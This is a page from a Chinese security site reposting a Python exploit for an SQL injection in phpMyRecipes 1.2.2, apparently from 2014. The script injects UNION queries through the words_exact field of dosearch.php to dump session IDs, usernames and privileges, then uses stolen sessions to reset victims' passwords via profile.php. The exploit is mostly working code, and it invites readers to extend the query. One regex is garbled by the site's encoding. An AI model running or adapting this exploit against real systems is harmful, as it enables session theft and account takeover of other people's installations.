首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
phpMyRecipes 1.2.2 (dosearch.php, words_exact param) - SQL Injection
来源:vfocus.net 作者:bard 发布时间:2014-11-26  
#!/usr/bin/python

import httplib
from bs4 import BeautifulSoup
import re
import os

###########
# Function that takes an SQL select statement and inject it into the words_exact variable of dosearch.php 
# Returns BeautifulSoup object 
###########
def sqli(select):
  inject = '"\' IN BOOLEAN MODE) UNION ' + select + '#'
  body = 'words_all=&words_exact=' + inject + '&words_any=&words_without=&name_exact=&ing_modifier=2'
  c = httplib.HTTPConnection('127.0.0.1:80')
  c.request("POST", '/phpMyRecipes/dosearch.php', body, headers)
  r = c.getresponse()
  html = r.read()
  return BeautifulSoup(html)

#############
# Variables #
#############
headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:22.0) Gecko/20100101 Firefox/22.0 Iceweasel/22.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Endocing": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded"}
select = 'SELECT userid,sessionID from sessions;'   # Modify the select statement to see what else you can do
data = {}

###########
# Run Injection and see what comes back
###########
soup = sqli(select)

###########
# Parse returned information with BeautifulSoup- store in data dictionary
###########
for ID in soup("a", text=re.compile(r"^.{32}___FCKpd___0quot;)):
  data[ID.string] = {}
  values = ['userid','username','cookieOK','privs','ts']
  for value in values:
   #select = "SELECT NULL,userid from sessions where sessionID='" + ID.string + "';"
   select = "SELECT NULL," + value + " from sessions where sessionID='" + ID.string + "';"
   soup = sqli(select)
   rval = soup("a")[-1].string
   data[ID.string][value] = rval

###########
# Loop through data- print session information and decide if you want to change a user's password
###########
for sessionid,values in data.iteritems():
 print "Session ID: " + sessionid
 for field,value in values.iteritems():
  print "\t" + field + ": " + value
 print("Do you want to change this user's password? (y/N)"),
 ans = 'N'
 ans = raw_input()
 goforth = re.compile("[Yy].*")
 if goforth.match(ans):
  print("Enter new password: "),
  os.system("stty -echo")
  password1 = raw_input()
  os.system("stty echo")
  print("\nAgain with the password: "),
  os.system("stty -echo")
  password2 = raw_input()
  os.system("stty echo")
  print ("")
  if password1 == password2:
   body = 'sid=' + sessionid + '&username=' + data[sessionid]['username'] + '&name=Hacked&email=hacked%40hacked.com&password1=' + password1 + '&password2=' + password1
   c = httplib.HTTPConnection('127.0.0.1:80')
   c.request("POST", '/phpMyRecipes/profile.php', body, headers)
   r = c.getresponse()
   html = r.read()
   print ("===================================")
   print BeautifulSoup(html)("p",{"class": "content"})[0].string
   print ("===================================\n\n")
  else:
   print "Passwords did not match"

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·TRENDnet SecurView Wireless Ne
·Arris VAP2500 Authentication B
·WordPress WP-DB-Backup 2.2.4 B
·Linux Kernel libfutex Local Ro
·FluxBB 1.5.6 SQL Injection
·All-in-One WP Migration 2.0.2
·Atrax Botnet Shell Upload Vuln
·Mozilla Firefox 3.6 mChannel U
·Wordpress wpDataTables 1.5.3 s
·PHP 5.x / Bash Shellshock Proo
·Internet Explorer OLE Pre-IE11
·KMPlayer 3.9.1.130 Denial Of S
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved